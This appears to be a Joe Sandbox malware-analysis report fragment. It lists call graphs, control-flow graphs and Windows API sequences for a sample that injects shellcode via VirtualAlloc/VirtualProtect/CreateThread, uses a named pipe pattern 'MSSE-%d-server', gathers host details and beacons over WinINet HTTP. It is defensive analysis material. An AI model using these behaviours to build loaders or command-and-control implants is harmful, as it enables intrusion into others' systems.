API calls 37501->37503 37504 67b802 37501->37504 37505 67eaa8 _DllMainCRTStartup 41 API calls 37501->37505 37503->37501 37756 6760e0 8 API calls 2 library calls 37504->37756 37505->37501 37506->37412 37507->37417 37508->37419 37509->37419 37511 67f284 malloc 38 API calls 37510->37511 37512 67600d 37511->37512 37513 67f284 malloc 38 API calls 37512->37513 37516 676015 _vsnprintf_helper _DllMainCRTStartup 37512->37516 37514 676021 37513->37514 37514->37516 37626 67f244 37514->37626 37516->37424 37518 67f29c 37517->37518 37519 67f318 37517->37519 37521 67f2d4 HeapAlloc 37518->37521 37522 67f2b4 37518->37522 37527 67f2fd 37518->37527 37531 67f302 37518->37531 37636 681db4 DecodePointer 37518->37636 37639 681db4 DecodePointer 37519->37639 37521->37518 37526 67f30d 37521->37526 37522->37521 37633 681df0 34 API calls 2 library calls 37522->37633 37634 681e64 34 API calls 3 library calls 37522->37634 37635 67ff54 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 37522->37635 37523 67f31d 37640 681d18 8 API calls _getptd_noexit 37523->37640 37526->37426 37637 681d18 8 API calls _getptd_noexit 37527->37637 37638 681d18 8 API calls _getptd_noexit 37531->37638 37641 68145c GetSystemTimeAsFileTime 37534->37641 37539 67f284 malloc 38 API calls 37541 67c2a1 _vsnprintf_helper GetPdbDllFromInstallPath 37539->37541 37542 67c30a 37541->37542 37646 68181c 37541->37646 37543 68181c strtok 47 API calls 37542->37543 37544 66cb87 37543->37544 37545 6734a0 37544->37545 37546 68145c _time64 GetSystemTimeAsFileTime 37545->37546 37547 6734b3 37546->37547 37548 68044c _DllMainCRTStartup 44 API calls 37547->37548 37549 6734bb _DllMainCRTStartup 37548->37549 37688 672f5c 37549->37688 37552 67eaa8 37553 67eae7 37552->37553 37558 67eafd _vsnprintf_helper 37552->37558 37554 67eaf3 37553->37554 37555 67eaff 37553->37555 37556 67f284 malloc 38 API calls 37554->37556 37693 681914 41 API calls 5 library calls 37555->37693 37556->37558 37558->37432 37560 66f3d4 _DllMainCRTStartup 37559->37560 37561 66cbd4 37560->37561 37562 66f3da GetLocalTime 37560->37562 37561->37437 37561->37439 37563 66f408 _DllMainCRTStartup 37562->37563 37563->37561 37566 66f20e _DllMainCRTStartup 37564->37566 37565 66cc05 37565->37445 37565->37446 37566->37565 37566->37566 37694 67a8dc 63 API calls _DllMainCRTStartup 37566->37694 37568 66f248 37695 67a914 62 API calls 3 library calls 37568->37695 37572 66f299 _DllMainCRTStartup 37570->37572 37571 66cc13 37571->37450 37571->37452 37572->37571 37573 66f2eb htonl htonl 37572->37573 37573->37571 37574 66f30b 37573->37574 37575 67f284 malloc 38 API calls 37574->37575 37576 66f315 GetPdbDllFromInstallPath _DllMainCRTStartup 37575->37576 37577 66f36b _vsnprintf_helper 37576->37577 37696 67a8dc 63 API calls _DllMainCRTStartup 37576->37696 37581 67f244 free 8 API calls 37577->37581 37579 66f34c 37697 67a914 62 API calls 3 library calls 37579->37697 37581->37571 37583 675c88 getSystemCP 37582->37583 37698 661218 37583->37698 37587 675ca8 __security_init_cookie 37588 675cae GetTickCount 37587->37588 37589 68044c _DllMainCRTStartup 44 API calls 37588->37589 37590 675cbf 37589->37590 37704 66cfa4 CryptAcquireContextA CryptAcquireContextA CryptReleaseContext GetSystemTimeAsFileTime _DllMainCRTStartup 37590->37704 37592 675cc4 _DllMainCRTStartup 37593 675cfe 37592->37593 37594 675cec GetCurrentProcess 37592->37594 37705 67dec8 CheckTokenMembership FreeSid _DllMainCRTStartup 37593->37705 37741 670c64 GetModuleHandleA GetProcAddress 37594->37741 37596 675cfa 37596->37593 37598 675d06 37706 66e2a8 htonl htonl 37598->37706 37600 675d1c 37707 66e200 htonl GetPdbDllFromInstallPath 37600->37707 37602 675d2f 37708 66e200 htonl GetPdbDllFromInstallPath 37602->37708 37604 675d3f 37709 66e200 htonl GetPdbDllFromInstallPath 37604->37709 37606 675d4f 37710 66e248 htonl htonl _DllMainCRTStartup 37606->37710 37608 675d5e __security_init_cookie 37711 66e248 htonl htonl _DllMainCRTStartup 37608->37711 37610 675d6f 37712 66e278 htonl _DllMainCRTStartup 37610->37712 37612 675d7a 37713 66e1e0 htonl _DllMainCRTStartup 37612->37713 37614 675d85 37714 675e28 37614->37714 37627 67f249 HeapFree 37626->37627 37631 67f279 _dosmaperr 37626->37631 37628 67f264 37627->37628 37627->37631 37632 681d18 8 API calls _getptd_noexit 37628->37632 37630 67f269 GetLastError 37630->37631 37631->37516 37632->37630 37633->37522 37634->37522 37636->37518 37637->37531 37638->37526 37639->37523 37640->37526 37642 67c259 37641->37642 37643 68044c 37642->37643 37655 685844 37643->37655 37647 685844 _getptd 44 API calls 37646->37647 37648 681840 37647->37648 37649 68190e 37648->37649 37652 681861 37648->37652 37685 688c50 RtlCaptureContext RtlLookupFunctionEntry UnhandledExceptionFilter IsProcessorFeaturePresent __report_securityfailure 37649->37685 37651 681913 37676 687e20 37652->37676 37660 685868 GetLastError 37655->37660 37657 68584f 37658 67c261 37657->37658 37672 6800b4 44 API calls 3 library calls 37657->37672 37658->37539 37673 6840a8 37660->37673 37662 685885 37663 684728 _calloc_crt 6 API calls 37662->37663 37671 6858d2 _getptd_noexit 37662->37671 37664 68589a 37663->37664 37665 6840c4 _mtinit TlsSetValue 37664->37665 37664->37671 37666 6858b0 37665->37666 37667 6858cd 37666->37667 37668 6858b7 _initptd 37666->37668 37669 67f244 free 6 API calls 37667->37669 37670 6858be GetCurrentThreadId 37668->37670 37669->37671 37670->37671 37671->37657 37674 6840b8 37673->37674 37675 6840bb TlsGetValue 37673->37675 37674->37675 37677 687e29 37676->37677 37678 688b7c IsProcessorFeaturePresent 37677->37678 37679 681903 37677->37679 37680 688b93 37678->37680 37679->37541 37686 683ffc RtlCaptureContext RtlLookupFunctionEntry __crtCaptureCurrentContext 37680->37686 37682 688ba6 37687 688b30 UnhandledExceptionFilter __raise_securityfailure __crtUnhandledException __crtMessageBoxW 37682->37687 37685->37651 37686->37682 37689 66cb94 37688->37689 37690 672f87 _DllMainCRTStartup 37688->37690 37689->37552 37690->37689 37691 67f284 malloc 38 API calls 37690->37691 37692 67eaa8 _DllMainCRTStartup 41 API calls 37690->37692 37691->37690 37692->37690 37693->37558 37694->37568 37695->37565 37696->37579 37697->37577 37744 661184 CryptAcquireContextA 37698->37744 37701 661245 37703 67b0b4 38 API calls _DllMainCRTStartup 37701->37703 37703->37587 37704->37592 37705->37598 37706->37600 37707->37602 37708->37604 37709->37606 37710->37608 37711->37610 37712->37612 37713->37614 37715 675fec _DllMainCRTStartup 38 API calls 37714->37715 37716 675e51 _DllMainCRTStartup 37715->37716 37717 675eb5 GetComputerNameA 37716->37717 37750 66f008 37717->37750 37741->37596 37745 6611c2 CryptAcquireContextA 37744->37745 37748 6611e6 _DllMainCRTStartup 37744->37748 37746 66120c 37745->37746 37745->37748 37746->37701 37749 6610d0 GetSystemTimeAsFileTime clock 37746->37749 37747 6611fd CryptReleaseContext 37747->37746 37748->37747 37749->37701 37752 66f02f _DllMainCRTStartup 37751->37752 37753 66f058 WSAIoctl 37752->37753 37754 66f051 _DllMainCRTStartup 37752->37754 37753->37754 37754->37497 37755->37501 37757 689cec 37758 689d01 37757->37758 37764 689d1e 37757->37764 37759 689d0f 37758->37759 37758->37764 37765 681d18 8 API calls _getptd_noexit 37759->37765 37761 689d36 HeapAlloc 37762 689d14 37761->37762 37761->37764 37764->37761 37764->37762 37766 681db4 DecodePointer 37764->37766 37765->37762 37766->37764 37767 1b88d4 37768 1b8961 37767->37768 37773 1b9324 37768->37773 37770 1b8a01 37777 1b96b4 37770->37777 37772 1b8a8f 37776 1b935e 37773->37776 37774 1b9479 37774->37770 37775 1b9455 VirtualAlloc 37775->37774 37776->37774 37776->37775 37780 1b9723 37777->37780 37778 1b994f 37778->37772 37779 1b976e LoadLibraryA 37779->37780 37780->37778 37780->37779

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10 401180-4011ae 11 401460-401463 GetStartupInfoA 10->11 12 4011b4-4011d1 10->12 14 401470-40148a call 402e88 11->14 13 4011e9-4011f4 12->13 15 4011f6-401204 13->15 16 4011d8-4011db 13->16 20 401417-401426 call 402e90 15->20 21 40120a-40120e 15->21 18 401400-401411 16->18 19 4011e1-4011e6 Sleep 16->19 18->20 18->21 19->13 28 401229-40122b 20->28 29 40142c-401447 _initterm 20->29 24 401490-4014a9 call 402e80 21->24 25 401214-401223 21->25 36 4014ae-4014b6 call 402e60 24->36 25->28 25->29 31 401231-40123e 28->31 32 40144d-401452 28->32 29->31 29->32 33 401240-401248 31->33 34 40124c-401299 call 401fd0 SetUnhandledExceptionFilter call 4024e0 call 402ef0 call 401d40 call 402f00 31->34 32->31 33->34 48 4012b2-4012b8 34->48 49 40129b 34->49 50 4012a0-4012a2 48->50 51 4012ba-4012c8 48->51 52 4012f0-4012f6 49->52 56 4012a4-4012a7 50->56 57 4012e9 50->57 53 4012ae 51->53 54 4012f8-401302 52->54 55 40130e-401333 malloc 52->55 53->48 60 4013f0-4013f5 54->60 61 401308 54->61 62 401335-40133a 55->62 63 40137b-4013af call 401950 call 403040 55->63 58 4012d0-4012d2 56->58 59 4012a9 56->59 57->52 58->57 65 4012d4 58->65 59->53 60->61 61->55 66 401340-401374 strlen malloc memcpy 62->66 72 4013b4-4013c2 63->72 68 4012d8-4012e2 65->68 66->66 69 401376 66->69 68->57 71 4012e4-4012e7 68->71 69->63 71->57 71->68 72->36 73 4013c8-4013d0 72->73 73->14 74 4013d6-4013e5 73->74
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                                                  • String ID: 0PE$@6E$DCE
                                                                  • API String ID: 649803965-2430247936
                                                                  • Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                                                                  • Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
                                                                  • Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                                                                  • Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 0066E725
                                                                    • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                                                                    • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                                                                    • Part of subcall function 00677B38: _snprintf.LIBCMT ref: 00677CA5
                                                                  • _snprintf.LIBCMT ref: 0066E7BD
                                                                  • _snprintf.LIBCMT ref: 0066E7D4
                                                                  • HttpOpenRequestA.WININET ref: 0066E818
                                                                  • HttpSendRequestA.WININET ref: 0066E84A
                                                                  • InternetQueryDataAvailable.WININET ref: 0066E87A
                                                                  • InternetCloseHandle.WININET ref: 0066E898
                                                                    • Part of subcall function 00672D70: strchr.LIBCMT ref: 00672DD6
                                                                    • Part of subcall function 00672D70: _snprintf.LIBCMT ref: 00672E0C
                                                                    • Part of subcall function 00672C0C: strchr.LIBCMT ref: 00672C69
                                                                    • Part of subcall function 00672C0C: _snprintf.LIBCMT ref: 00672CB3
                                                                  • InternetReadFile.WININET ref: 0066E8D4
                                                                  • InternetCloseHandle.WININET ref: 0066E8F5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                                                                  • String ID: %s%s$*/*
                                                                  • API String ID: 3536628738-856325523
                                                                  • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                                                  • Instruction ID: d172ce45b955779f0415644ddcf92c05ff9dd92b9507bddcc31c82f88435206d
                                                                  • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                                                  • Instruction Fuzzy Hash: 7B61D236700B8186EB50DF65E4507AEB7A7F785B98F40412AEE4D57B58DF39C50AC700

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                                                                  • String ID: %s%s%s
                                                                  • API String ID: 1671524875-1891519693
                                                                  • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                                                  • Instruction ID: c28a7dd79399c0947703d9ca336236560d4538fccad7daf3844f32ce664af0b6
                                                                  • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                                                  • Instruction Fuzzy Hash: 2241D23470468146EA44FB22E92472E779BBB85FD0F848129FE5A0BF55CF3DC1528748

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 182 661184-6611c0 CryptAcquireContextA 183 6611e6-6611f9 call 692020 182->183 184 6611c2-6611e4 CryptAcquireContextA 182->184 188 6611fd-66120a CryptReleaseContext 183->188 189 6611fb 183->189 184->183 185 66120c-661216 184->185 188->185 189->188
                                                                  APIs
                                                                  • CryptAcquireContextA.ADVAPI32 ref: 006611B8
                                                                  • CryptAcquireContextA.ADVAPI32 ref: 006611DC
                                                                  • CryptGenRandom.ADVAPI32 ref: 006611F0
                                                                  • CryptReleaseContext.ADVAPI32 ref: 00661204
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Crypt$Context$Acquire$RandomRelease
                                                                  • String ID: ($Microsoft Base Cryptographic Provider v1.0
                                                                  • API String ID: 685801729-4046902070
                                                                  • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                                                  • Instruction ID: f528ba85227e950b9a5ff7247e49097112dbfb7c3d4fe532c91b4787bb7a5fda
                                                                  • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                                                  • Instruction Fuzzy Hash: D901D83570074182E710CF65E898359B767F7D8F88F488025D74987B24CF79C699C740

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 399 401630-40168d CreateNamedPipeA 400 4016dc-4016e5 399->400 401 40168f-4016a1 ConnectNamedPipe 399->401 401->400 402 4016a3-4016a5 401->402 403 4016c6-4016cf CloseHandle 402->403 404 4016a7-4016c4 WriteFile 402->404 403->400 404->403 405 4016d1-4016da 404->405 405->402
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                                                                  • String ID:
                                                                  • API String ID: 2239253087-0
                                                                  • Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                                                                  • Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
                                                                  • Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                                                                  • Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • malloc.MSVCRT ref: 004017B9
                                                                  • SleepEx.KERNELBASE ref: 004017CD
                                                                    • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                                                                    • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                                                                    • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                                                                  • GetTickCount.KERNEL32 ref: 004017FC
                                                                  • CreateThread.KERNEL32 ref: 00401885
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                                                                  • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                                                                  • API String ID: 3660650057-1020837823
                                                                  • Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                                                                  • Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
                                                                  • Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                                                                  • Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0067E0FC: RevertToSelf.ADVAPI32 ref: 0067E10A
                                                                  • InternetOpenA.WININET ref: 0066EB0C
                                                                  • InternetSetOptionA.WININET ref: 0066EB2C
                                                                  • InternetSetOptionA.WININET ref: 0066EB44
                                                                  • InternetConnectA.WININET ref: 0066EB7A
                                                                  • InternetSetOptionA.WININET ref: 0066EBB7
                                                                  • InternetSetOptionA.WININET ref: 0066EBE2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Internet$Option$ConnectOpenRevertSelf
                                                                  • String ID:
                                                                  • API String ID: 1513466045-0
                                                                  • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                                                  • Instruction ID: a3c04ec4af3ea140744b9b6893a1626f6dc64dd5709c99981c3f251268a58bfe
                                                                  • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                                                  • Instruction Fuzzy Hash: BD412935300B8182EB54EF51F4A57A977A3F789B88F148019DA4A17B1ADF3EC426CB04

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 228 66ca74-66cbd6 call 675fec call 6761e8 * 3 call 67b454 call 67b464 * 2 call 67b434 * 2 call 67b454 * 2 call 67f284 call 67b434 * 3 call 67b464 call 67c230 call 6734a0 call 67eaa8 * 2 call 66f3c0 271 66cbdd-66cbf2 call 67b434 call 66f1e4 228->271 272 66cbd8 call 67da74 228->272 278 66cbf4 call 67da74 271->278 279 66cbf9-66cc07 call 66f1f8 271->279 272->271 278->279 283 66cc0e-66cc15 call 66f274 279->283 284 66cc09 call 67da74 279->284 288 66cc17 call 67da74 283->288 289 66cc1c-66cc55 call 67b464 call 67b434 call 67f284 283->289 284->283 288->289 297 66cc57 call 67da74 289->297 298 66cc5c-66cc90 call 67b434 call 67eaa8 call 67b434 call 675c60 289->298 297->298 308 66cc96-66cc9d 298->308 309 66cebb-66cee7 call 67c218 call 67f244 call 67da74 298->309 310 66cca2-66cd24 call 67bfc0 call 67f63c call 67bfc0 call 67f63c * 2 call 672ee0 308->310 329 66cd26-66cd2a 310->329 330 66cd44-66cd77 call 66ea48 call 67b434 call 66e9f4 310->330 332 66cd2e-66cd35 329->332 341 66cd9c-66cd9f 330->341 342 66cd79-66cd87 call 67ad44 330->342 332->332 333 66cd37-66cd3a 332->333 333->330 335 66cd3c-66cd3f call 6731f4 333->335 335->330 343 66ce26 341->343 344 66cda5-66cdc8 call 676b98 call 67b434 341->344 351 66cd95-66cd98 342->351 352 66cd89-66cd93 call 678e0c 342->352 347 66ce2c-66ce38 call 66e9c8 call 66f3c0 343->347 360 66cdcf-66cdf0 call 6718c4 call 675144 call 674a04 call 66f3c0 344->360 361 66cdca 344->361 362 66ce3f-66ce5d call 67bf04 347->362 363 66ce3a call 67da74 347->363 351->341 352->341 388 66cdf2-66cdf5 call 66f484 360->388 389 66cdfa-66ce01 360->389 361->360 370 66ce64-66ce6c 362->370 371 66ce5f call 67da74 362->371 363->362 370->309 374 66ce6e-66ce76 370->374 371->370 376 66cea4 call 67211c 374->376 377 66ce78-66ce89 374->377 384 66cea9-66ceb5 376->384 380 66ce9c 377->380 381 66ce8b-66ce9a call 66f3a0 377->381 386 66ce9e-66cea0 380->386 381->386 384->309 384->310 386->376 387 66cea2 386->387 387->376 388->389 389->347 392 66ce03-66ce24 call 66e9c8 call 66ea48 call 66ec04 389->392 392->347
                                                                  APIs
                                                                    • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                                                                  • malloc.LIBCMT ref: 0066CB3B
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                    • Part of subcall function 0067C230: _time64.LIBCMT ref: 0067C254
                                                                    • Part of subcall function 0067C230: malloc.LIBCMT ref: 0067C29C
                                                                    • Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C300
                                                                    • Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C311
                                                                    • Part of subcall function 006734A0: _time64.LIBCMT ref: 006734AE
                                                                    • Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8
                                                                    • Part of subcall function 0067EAA8: realloc.LIBCMT ref: 0067EB07
                                                                    • Part of subcall function 0066F3C0: GetLocalTime.KERNEL32 ref: 0066F3DF
                                                                  • malloc.LIBCMT ref: 0066CC4A
                                                                  • _snprintf.LIBCMT ref: 0066CCC1
                                                                  • _snprintf.LIBCMT ref: 0066CCE7
                                                                  • free.LIBCMT ref: 0066CEC6
                                                                    • Part of subcall function 0067AD44: malloc.LIBCMT ref: 0067AD78
                                                                    • Part of subcall function 0067AD44: free.LIBCMT ref: 0067AF2F
                                                                    • Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E3D
                                                                    • Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E4A
                                                                  • _snprintf.LIBCMT ref: 0066CD0E
                                                                    • Part of subcall function 0067DA74: Sleep.KERNEL32 ref: 0067DABC
                                                                    • Part of subcall function 0067DA74: ExitThread.KERNEL32 ref: 0067DAC6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                                                                  • String ID:
                                                                  • API String ID: 548016584-0
                                                                  • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                                                  • Instruction ID: 16eebcad59399b91420e8f2b6aaa84d72e3de6bc391615428ee9825792860063
                                                                  • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                                                  • Instruction Fuzzy Hash: 71A1E17130068146DB98FB72E8657AE23A3BF85790F44913DAE5E4B75ADF39C805C708

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 406 66f014-66f04f call 66f118 call 692660 411 66f051-66f053 406->411 412 66f058-66f097 WSAIoctl 406->412 413 66f0f6-66f10a 411->413 414 66f0b4-66f0be 412->414 415 66f099-66f0b0 412->415 416 66f0c0 414->416 417 66f0eb-66f0ee call 6925e8 414->417 415->414 418 66f0c5-66f0cf 416->418 422 66f0f4 417->422 420 66f0d6-66f0e2 418->420 421 66f0d1-66f0d4 418->421 420->417 424 66f0e4 420->424 421->420 423 66f0e6 421->423 422->413 423->417 424->418
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: IoctlSocketStartupclosesocket
                                                                  • String ID:
                                                                  • API String ID: 365704328-0
                                                                  • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                                                  • Instruction ID: 2237a941fd2ae6f7b750c7a65c64ae29eca4d48651673b50a0ea1dd646ee54ff
                                                                  • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                                                  • Instruction Fuzzy Hash: 72219D727087C083D7208F24F5A075AB7A6F3887E4F648635EE9D43B8ADB39C5568B00

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 425 401595-4015c5 VirtualAlloc 426 4015c7-4015c9 425->426 427 4015e0-40162c call 401563 VirtualProtect CreateThread 426->427 428 4015cb-4015de 426->428 428->426
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
